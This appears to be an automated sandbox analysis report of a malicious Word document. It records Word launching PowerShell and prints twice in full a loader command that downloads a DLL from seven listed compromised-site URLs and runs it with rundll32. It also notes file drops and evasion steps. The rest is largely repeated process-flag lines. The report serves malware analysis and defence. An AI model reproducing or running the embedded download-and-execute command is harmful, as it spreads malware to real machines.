Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_046E12A1 push es; ret	5_2_046E12B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615D8067 push ecx; ret	14_2_615D807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5C26 push ecx; ret	14_2_615B5C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00671229 push eax; retf	16_2_0067129A

PE file contains an invalid checksum

Source: 13791789.dll.5.dr

Static PE information: real checksum: 0x81586 should be: 0x7d179

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\13791789.dll

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\13791789.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk:Zone.Identifier read attributes | delete

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B7C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_615B7C47

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\svchost.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
